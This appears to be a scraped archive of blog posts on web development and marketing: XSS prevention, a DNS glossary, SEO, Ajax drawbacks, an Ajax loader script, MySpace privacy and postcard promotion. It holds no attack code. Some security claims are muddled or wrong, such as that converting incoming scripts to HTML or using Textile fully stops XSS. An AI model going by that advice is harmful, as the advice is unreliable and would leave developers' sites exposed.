Cross Site Script or XSS is one of the popular methods for attacking not only to Ajax based websites but almost any other website that accepts user inputs. Even before Ajax was conceptualized, this attack was already practiced by different hackers. There was one hack that was used in 2005 wherein MySpace.com was targeted. It uses a simple JavaScript function that could be embedded in user’s website and others. Once they view the webpage, the “My Hero” link is changed to the name of the hacker. It is practically a pyramid hack since anyone who sees the profile became the host of the hack. The code was actually posted by the builder of the hack in possible reparation for what he did. It is just a simple JavaScript that could be embedded in any website. It just does not hack any information, it practically takes over every function it wants to.

Here are some practices that will prevent future attacks using XSS.

1. Filtering Input

One of the main reasons why some of the websites experience this type of attack is that it does not screen anything that comes from outside sources. You may notice that YouTube and other blogging sites limit the functions to simple HTML tags such as bold, italic and even simple changes and animations. Sometimes there are sites that allow JavaScript functions to be part of the posting. Once this is admitted, everything could be taken over by attacker. Although the attacker may need to create another function to be able to completely control the program, all they need are simple functions that could access and extract different information from users. When you are able to filter inputs, you practically won’t allow anyone to post outside the allowed tags.

2. Disabling Functions

This security measures has its pros and cons. Its most obvious advantage is that it does not allow anything outside what you have specified. You can disable any functions related to JavaScript, Flash, Java or any other functions from performing anything in your program. However its disadvantage comes from the fact that you cannot possibly run anything yourself when you are preventing it from happening. If you are just running a simple forum then there is no problem about the site disabling other functions. However, when you are talking about user generated videos or music and codes; you will be crippling your own operation.

3. Convert Incoming Functions to HTML

If you cannot live with the incoming functions, here is a simple trick: convert all incoming tags and posts to HTML. Every JavaScript functionality has an HTML counterpart so there is a great probability that each function will work but not as an intrusive script but a helpful function as it is rendered in HTML. If the attack is not cloaked and comes in as an intrusion straight up, it will not be able to function at all. Here are some websites that actually provides a code on how to convert a function to HTML:

1. http://hp.jpsband.org/
2. http://daringfireball.net/projects/markdown/
3. http://textism.com/tools/textile/

Among the three, the last one is a perfect solution to any JavaScript function. If the library could be properly installed, it will work seamlessly without any concern of attacks.

Posted by MixedSoup | No Comments »

Stop with the enforced e-mail forwards already! Trying to force or bribe people to forward your info to a friends or family in order to be rewarded or win looks skanky in today’s ultra-permission-based world. Especially when you tell visitors nothing about their friend’s or family’s privacy in the space directly next to the e-mail form.

A true viral campaign gets forwarded because consumers are compelled to do so by the glory of the content, not because you bribed them with points or something else.

What absolutely will not work:

Suggesting that e-mail recipients forward your message to their friends and family will not work. Adding a line at the bottom of your e-mail that reads “Please feel free to forward this message to a friend” is more likely to get it deleted than forwarded.

What absolutely will work:

Offering something worthy of sharing like a valuable discount, vital information or offering an incentive for sharing like additional entries into a sweepstakes or an added discount or premium service will work.

Relevant or timely information, research, or studies that are included in your e-mail might encourage the recipients to share with their family and friends. Interactive content like a quiz or test, especially if it’s fun, will inspire forwarding.

Jokes and cartoons are almost always forwarded to everybody the recipient knows.  Why?  Because they are entertaining and entertainment is meant to be shared.

A really cool multimedia experience is always going to achieve a lot of pass-along. Rich media is new and the novelty and tech factors alone are often enough to make the e-mail recipient eager to share it.

Oops!  Almost forgot one really important thing….You can craft a brilliant e-mail following all the rules, but if a consumer visits your site and has an experience less that what was promised, you are going to achieve viral marketing, alright…the bad kind.  So be certain that your product or service is ready and is as advertised.

Posted by MixedSoup | No Comments »

A Record:
An ‘A record’ is part of the zone file. It is used to point Internet traffic to an IP address. For example, you can use an ‘A record’ to designate abc.yourdomain.com to send traffic to your website at IP address 209.15.32.135. You can also designate xyz.yourdomain.com to go to a separate IP address.

DNS:
The Domain Name System (DNS) helps users to find their way around the Internet. Every computer on the Internet has a unique address - just like a telephone number - which is a rather complicated string of numbers. It is called its ‘IP address’ (IP stands for ‘Internet Protocol’). IP Addresses are hard to remember. The DNS makes using the Internet easier by allowing a familiar string of letters (the ‘domain name’) to be used instead of the arcane IP address. So instead of typing 207.151.159.3, you can type www.internic.net. It is a ‘mnemonic’ device that makes addresses easier to remember.

Domain Name:
A domain name, such as MixedSoup.com, signifies your own address on the Internet. As no two parties may ever hold identical domain names, it is truly a unique identifier of you or your company. It is how your customers will remember you and find you among the millions of other websites on the Internet.

Domain Name Registration:
To own your preferred domain name, you need to register it on the Internet. This paid service is offered by several websites, who register your domain name, provided it is not taken-up yet by anyone else. When you register a domain name, you are inserting an entry into a directory of all the domain names and their corresponding computers on the Internet.

Domain Name Servers:
A server that retains the addresses and routing information for TCP/IP LAN users.

Domain Name Transfer:
At times, domains are sold to another organization or sometimes the name of a company might change. Most registries require a letter of permission from the old owner to hand over control to the new owner. The procedures for Transfer of ownership will depend on the registry.

Domain Lock:
This facility helps to keep your domain secure from disgruntled ex-employees and hackers. Once you activate Domain Lock, no changes to your domain is permitted. Your domain has unlocked by you before the domain can change hosting, contacts, registrants or even transfer out to another registrar.

The Domain Lock section is password-protected, meaning only the authorized user can access this section. The username and password to the account is not enough. It asks the user additional queries like “what’s your mother’s maiden name?”; “your pet’s name is…” and so on. Facts that only you know.

Email Auto-responder:
An auto-responder is a mailbox which automatically sends a pre-formatted response message to senders. For example, if you have an info@domain.com mailbox that receives information queries from your customers, you can configure the mailbox to immediately send a pre-formatted information message to the sender of each incoming mail. For instance, “Thanks for writing in. We shall reply to you within 2 business days”.

Email Alias:
An email alias is one or more additional names that direct mail to an email address. For example, if your email address is sales@domain.com, then you may choose to create aliases like salesenquiry@domain.com and prospects@domain.com, which can be programmed to deliver all mail to a single email address - sales@domain.com.

Email Forwarding:
Having email automatically sent (forwarded) from one (or more) email address, to another (possibly more than one) email address that you specify. If a person has ‘unlimited email forwarding’, then an email of the form, anything@domain.com will be sent to the forwarding address. For example, support@domain.com, partner@domain.com and sales@domain, will all be sent to the account (some hosts allow you to have these sent to different accounts) specified to be sent to.

FQDN (Fully Qualified Domain Name):
Consists of a host and domain name, including the top-level domain. For example, www.MixedSoup.com is a FQDN - www is the host, MixedSoup is the second-level domain, and .com is the top level domain.

ICANN:
Internet Corporation for Assigned Names and Numbers (ICANN) is a non-profit corporation that is assuming responsibility from the U.S. Government for coordinating certain Internet technical functions, including the management of Internet domain name system. More information about ICANN can be found at http://www.icann.org.

MX Record:
MX (Mail Exchange) record is part of the zone file and is used to designate which mail server machine should process email for a specific domain.

Registrant:
The individual or organization that registers a specific domain name with a registrar. This individual or organization holds the right to use that specific domain name for a specified period of time, provided certain conditions are met and the registration fees are paid. This person or organization is the ‘legal entity’ bound by the terms of the Domain Name Registration Agreement with the registrar.

Registry:
An Internet domain name registry is an entity that receives domain name service (DNS) information from domain name registrars, inserts that information into a centralized database and propagates the information in Internet zone files on the Internet so that domain names can be found by users around the world via applications such as the world wide web and email.

Registry Registrar Protocol (RRP):
A protocol for the registration and management of second level domain names and associated name servers in both Top Level Domains (TLDs) and country code Top Level Domains (ccTLDs). This protocol was developed by the VeriSign registry for use within the Shared Registration System. RRP is a TCP-based, 7-bit US-ASCII text protocol that permits multiple registrars to provide second level Internet domain name registration services in the top level domains (TLDs) administered by a TLD registry.

Second Level Domain Name:
It is that portion of the domain name that appears immediately to the left of the top-level domain. For example, the ‘MixedSoup‘ in ‘MixedSoup.com‘. Second level domain names are used to represent businesses and other commercial concerns on the Internet.

URL (Uniform Resource Locator):
The web address, or location, of a website, file, or resource on the Internet (e.g. http://www.MixedSoup.com/ is a URL).

Zone File:
Files residing on a nameserver that designate a domain name, its subdomains, the IP address(s), and mail server. Parts of the zone file include the ‘A record’, CNAME, and MX records.

Posted by MixedSoup | 1 Comment »

Search Engine Optimization is a process of choosing the most appropriate targeted keyword phrases related to your site and ensuring that this ranks your site highly in search engines so that when someone searches for specific phrases it returns your site on tops. It basically involves fine tuning the content of your site along with the HTML and Meta tags and also involves appropriate link building process. The most popular search engines are Google, Yahoo, MSN Search, AOL and Ask Jeeves. Search engines keep their methods and ranking algorithms secret, to get credit for finding the most valuable search-results and to deter spam pages from clogging those results. A search engine may use hundreds of factors while ranking the listings where the factors themselves and the weight each carries may change continually. Algorithms can differ so widely that a webpage that ranks #1 in a particular search engine could rank #200 in another search engine. New sites need not be “submitted” to search engines to be listed. A simple link from a well established site will get the search engines to visit the new site and begin to spider its contents. It can take a few days to even weeks from the referring of a link from such an established site for all the main search engine spiders to commence visiting and indexing the new site.

If you are unable to research and choose keywords and work on your own search engine ranking, you may want to hire someone to work with you on these issues.

Search engine marketing and promotion companies, will look at the plan for your site and make recommendations to increase your search engine ranking and website traffic. If you wish, they will also provide ongoing consultation and reporting to monitor your website and make recommendations for editing and improvements to keep your site traffic flow and your search engine ranking high. Normally your search engine optimization experts work with your web designer to build an integrated plan right away so that all aspects of design are considered at the same time.

Posted by MixedSoup | No Comments »

Introduction

Ajax is the acronym for Asynchronous JavaScript and XML. It incorporates a suite of technologies aimed at improving user experience with web pages. It also allows programs written in different programming languages on different browsers to communicate with each other. Translation, communication and function between web applications happens remotely and, ideally, instantaneously. Another primary aim of Ajax is to reduce user delay when interacting with web pages. Ajax frameworks and technological components allow web applications to function on an as-need basis without requiring the re-loading of the entire web page.
Therefore, updates and functions don’t’ require human interaction nor does the user have to wait while requests are being processed. Ajax, ultimately, aims to produce Rich Internet Applications (RIAs). It allows web content to be re-loaded incrementally without changing web content. This single page interface increases user interactivity.
When Ajax became consolidated as a technique in 2005, it did so around much media hype. This article will describe Ajax methodologies that created that hype and outline some Ajax disadvantages.

Background and Components

Jesse James Garret defined in a 2005 article entitled “Ajax: A New Approach to Web Applications.” Its programming style incorporated a variety of open web standards. Open web standards are useful because they encourage application competitiveness and interoperability. This is good news for the user because it means that the most customized solution will be found for users’ needs.
Ajax functions through the collaboration of various technologies. A familiarity with the basic building blocks of Ajax will help in any discussion of its disadvantages. Ajax uses a combination of XHTML (Extensible Hypertext Markup Language), CSS (Cascading Style Sheets), JavaScript, and XML. XHTML provides a standardized markup language for web pages. It allows for designers to customize tags for the communication of data and the execution of requests between applications. In the case of Ajax, this occurs remotely through a web browser.
CSS enables web page styling and formatting. JavaScript is supported by both Microsoft and Netscape browser making it useful across many platforms and operating systems. It provides a standardized scripting language that is particularly useful for web programming development because it is easier and faster to write. XML formats transferred data between the client and server making it easily readable between the two. These files are dynamically generated through server-side scripting.

Disadvantages

When Ajax emerged as a methodology, it did so around considerable media hype. Ajax was positioned to revolutionize web development in the same way the “dot.com” boom did in the early 90’s. However, Ajax is often seen as just the re-using of existing technologies that programmers were using anyway. Also, some of the interfaces, while providing the convenience of a single page, were confusing and difficult to navigate. Another glitch in Ajax occurs because of limitations in browser integration. Ajax creates dynamic web pages, tailored to user specifications.
However, because the data and format in these pages needs to be so specific, the web page cannot connect with the browser history engine. This results in inconveniences and delays in searching. For example, because of this lack in browser integration, clicking on “back” to return to a previous page or search might not be allowed on a user’s browser. Dynamic web page updates, which are part and parcel of Ajax technology, also make bookmarking difficult. Because web pages are automatically updated, when a user returns to a page it might not contain the desired information. Another concern when using Ajax is respond time lag.
There might be a lag, for example, when the web page interface loads because of pre-loaded data and having to handle request objects properly. Visually, this could mean that different segments of the page interface are loaded at different times, creating confusion. When using Ajax, websites must also to take care to link their information to a public URL because some search engines aren’t equipped for Ajax. This stems from another Ajax disadvantage. Ajax reliance on JavaScript, which isn’t used by some search engines, means that web sites constructed through Ajax will require testing on several browsers for compatibility. This is because JavaScript can be installed differently on different browsers. Its ability for customization can also make it incompatible with other browsers.

Search for Solutions

However, in keeping with Ajax’s spirit of innovation, many solutions to these problems have been implemented. For example, using invisible IFRAMES allows the retrieval of history data. URL fragment identifiers let users bookmark and return to a particular state of an application. It also supports back-button functions. Microsoft’s development of Ajax Extensions includes an Update Progress function that lets the user know a page is being updated. This reduces user confusion in lag time. Ajax products continue to reconfigure themselves and re-combine with newer technologies to improve web user experiences.

Posted by MixedSoup | No Comments »

Communication from the server to the client sometimes is broken up that absolutely nothing is loaded to the webpage. It is a very easy concept most of the time since you will just load your XMLHttpRequest properly. However, the problem usually occurs when as simple as XML and HTTP cannot even recognize the request from XMLHttpRequest.

One of the tricks to ensure the program will properly load is to wrap the whole function in an AJAX loader. There are a lot of codes and samples out there but for today’s blog, we will take a look at a very popular script developed by Eddie Traversa.

What makes this loader remarkable is its simplicity anyone who has experience in Ajax and JavaScript will recognize how to customize the code immediately and complete the loader. This has been specifically built for XML and HTTP because it can easily handle these types of files. When your website transmits data asynchronously, XMLHttpRequest handles that stream of information but with the loader, you can make this work out even more.

There are just three steps to complete this function. Remember they can be customized according to your design specifications.

First is to load this code to your webpage’s header:

<HEAD>
<style type=”text/css”>
<!–
#contentLYR {
position:absolute;
width:200px;
height:115px;
z-index:1;
left: 200px;
top: 200px;
}
–>
</style>
<script type=”text/javascript”>
<!—Begin
function ajaxLoader(url,id) {
if (document.getElementById) {
var x = (window.ActiveXObject) ? new ActiveXObject(”Microsoft.XMLHTTP”) : new XMLHttpRequest();
}
if (x) {
x.onreadystatechange = function() {
if (x.readyState == 4 && x.status == 200) {
el = document.getElementById(id);
el.innerHTML = x.responseText;
}
}
x.open(”GET”, url, true);
x.send(null);
}
}
//–>
</script>
</HEAD>

Note that the header has already specified to whatever browser that you will have. Instead of additional headers you can even use this as your primary header since it is already complete in itself.

Next is to load this code in the event handler to trigger the server to load the file:

<BODY onload=”ajaxLoader(’demo.xml’,'contentLYR’)”>

Of course, you can change the ‘demo.xml’ with any file that you have or even a little bit of an html content. Remember to place this in the BODY of your code or else nothing will work.

Lastly, place this code in the body of the html file:

<div id=”contentLYR”>
</div>

Your webpage will basically recognize that something exists somewhere and that they’ll have to load it as part of their webpage.

In summary, what you just did in to trigger the Ajax loader is inform the webpage that an asynchronous function is coming up. Then you load the xml file on the event handler so that it could communicate with the XMLHttpRequest when need. Lastly, a simple HTML code will fetch the file and load it in the webpage.

As you can see, the Ajax loader is very easy to use and customize. Credit is due to Eddie Traversa for providing us this code that could upgrade the performance of any Ajax based site.

AJAX Load XML File Script Authored by Eddie Traversa is featured on Dynamic Drive (http://www.dynamicdrive.com/)

Posted by MixedSoup | No Comments »

A Group Policy setting found at User Configuration\Administrative Templates\System\User Profiles\Limit Profile Size can be used to limit the size of roaming user profiles, but this setting has a hard-coded maximum of 30MB. What if you need to allow roaming profiles to exceed this limit? If your client computers are running Windows Vista then you’re in luck as you can use Folder Redirection to reduce your profile size by redirecting hefty folders such as Documents, Music, Pictures etc. Folder Redirection and Roaming User Profiles can work well together, see Chapter 14 Managing Users and User Data in the Windows Vista Resource Kit for more info.

Posted by MixedSoup | No Comments »

Is there security and privacy on MySpace? This can be a difficult question to answer because there are many possible answers. There can be a certain degree of security and privacy available on MySpace but as with any online community there is also the potential for unsafe situations and violations of privacy. However, there are a couple of ways MySpace members can ensure they are receiving the highest levels of security and privacy possible. This includes being familiar with the terms of service, taking active measures to protect yourself and making use of the privacy features included in the software.

Read the Terms of Service Carefully

Reading the terms of service carefully can give users an understanding of the amount of security and privacy available on MySpace. These terms of service provide members with useful information for the types of activities or content which are prohibited on MySpace. Understanding these regulations will help members to understand whether their actions or the actions of other members are in violation of the terms of service. While the MySpace administrators do not have a policy of policing the community for content violations, they will respond to allegations by other members of violations and will take appropriate actions if the members are in fact found to be in violation of the terms of service. These actions may include deleting the members account and taking appropriate legal actions.

The MySpace privacy policy is referenced within the terms of service and this reference incorporates the entirety of the privacy policy into the terms of service. As a result members who join the MySpace community and agree to the terms of services are also, by default, agreeing to the privacy policy. Therefore, members should carefully review the privacy policy and familiarize themselves with the terms of this policy.

Protect Yourself on MySpace

Members of MySpace do have a small degree of protection afforded by the administrators of MySpace but they can provide themselves with a great deal of additional protection by being aware of how the Internet works and using common sense. Generic safety tips for protecting oneself on the Internet also apply to the MySpace community. Just like it is not wise to give out sensitive information such as your address or social security number on online discussion boards, it is not wise to list this type of information on a MySpace profile either.

MySpace members may think the information they post on their profile is only being viewed by their friends and the members of their extended network but this is not true. There can be many individuals on MySpace who are lurking and viewing members’ websites all the time. Some of these lurkers may be completely innocent but others may be harvesting information.

Making Profiles Private

MySpace does have some features which can give members an increased amount of protection. The ability to make a profile private is one of these features. Most MySpace profiles are public and are viewable by both members of the community and nonmembers. However, those who wish to keep their website private can make it only available to those on their friends list.

Members of MySpace also have the ability to remove members from their friends list or block other members from sending them emails or instant messages. Only members in your friends list can post comments on your website so if there are members who are leaving malicious comments, you can remove them from your friends list to avoid future problems. Also, if you are receiving harassing emails or messages you can block users to prevent them from contacting you in the future.

Posted by MixedSoup | No Comments »

Promoting your website is getting more difficult these days. New marketing tactics come and go fast. They work for a while then quickly fade away. Just keeping up with the changes can be a full time job. Here’s a proven way you can generate lots of traffic to your website …one that hasn’t faded away. In fact, it actually works better now than ever before - and you probably haven’t even tried it. What is it? Go offline and promote your website with postcards.

But, you say, “I’m an internet marketer, not a direct mail marketer.” Right, and so are most of your competitors.

That’s why they don’t market with postcards …and why most of them are not likely to try postcards anytime soon.

You won’t have much competition. Maybe that’s one of the reasons why postcards work so well for internet marketers.

It Costs Less than You Think

The cost for printing postcards starts at just a few cents each, depending on how you print them. And you can send postcards by First Class Mail in the US for just 26 cents each if you keep them between 3 1/2 to 4 1/4 inches high and between 5 to 6 inches wide.

OK. So you’re ready to give postcards a try. But where do you begin?

1. Start with the Mailing List

You’ll get a good response to your postcards if you send them to prospects already interested in what you offer.

You’ll get an even better response if those prospects also have a proven history of acting on offers they receive.

For example, get a list of prospects who previously requested information (or actually bought) something similar to what you sell - or a list of paid subscribers to a publication targeting the same interests that make them good prospects for what you sell.

You can get these and other similar lists from most mailing list brokers.

2. Don’t Forget Why You’re Mailing Postcards

The purpose of your postcards is to get the readers to visit your website (take an action). It’s not to close a sale for money (make a purchase). Postcards are too small to be effective at closing sales. Closing sales is what your website is designed to do.

3. Decide What to Say on Your Postcard

You don’t need to come up with a strategy to persuade people to read your postcard. It will be delivered with the message exposed and ready to read. So get right to the point.
Don’t focus on your product or service. Instead, spotlight the major benefits your product or service provides. That will arouse the reader’s interest and motivate them to find out more about those benefits …by going to your website.

Tip: Offer a bonus to those who visit your site before a specific deadline. It will boost the response.

That’s it. Just 3 simple steps. Try it. You’ll discover a profitable way to generate lots of website traffic - one you can use for many years to come.

Posted by MixedSoup | No Comments »

In a simple HTML website, developers will always have the luxury of keeping sensitive information to themselves. When you log in to the admin page of the website, the information that you see is solely for those who have proper authorization. Without username and password, hackers will have a really hard time figuring out how to access the information based on what they can extract from the webpage.

On the other hand, an Ajax based website does not have the same luxury. When an Ajax based website performs a function, it is not just the server the sees the source code, everyone will have the ability to see the information. With the source code, hackers can easily go further and go right directly to the server. That even goes to the information that can only be accessed by web administrator. Even without the admin username and password, hackers could easily bypass this authorization requirement and go directly to the information found in the server.

This usually happens when you translate HTML to an Ajax-based website or “Ajaxifying” the webpage. You have to remember an HTML based website is remarkably different compared to an Ajax based website. That means the administrative functions in HTML will not perform like in Ajax. As we have said the source code and basically most of the functions in Ajax is available to the user. Even though they do not have the faint idea of what the user name and password is. So imagine the things they should be able to access – user statistics, personal information and of course credit card information, the hackers favorite information.

If you are thinking what I am thinking, my initial reaction to this problem would be to keep the information hidden by placing the functions and information I am about to access in a non-shared folder. That seemed reasonable since a non-shared folder cannot be accessed by anyone. But I was wrong, way wrong. You see, the non-shared folder is placed in the server which is the exactly the same place hackers are accessing. Do not think that if you keep the folder in an obscure location will keep the hackers from accessing sensitive information. You are just buying time and more often than not, it will never protect any information at all.

So what can you do? Fortunately, there is something that you can do to ensure you that some of these functions cannot be accessed. Each of the function should have an authorization before it could be modified or accessed. It is going to be challenge especially when you have so many functions to deal with. Remember there are so many things that you have to reconfigure that it is going to be really hard to built an authorization one by one. But this is very important considering the vulnerability of your Ajax based website.

The solution to your problem is a very simple but very tiresome. But that is the only price that you have pay if you wanted to create a secure website. Always remember that an HTML does not have the same authorization capacity with an Ajax based website.

Posted by MixedSoup | No Comments »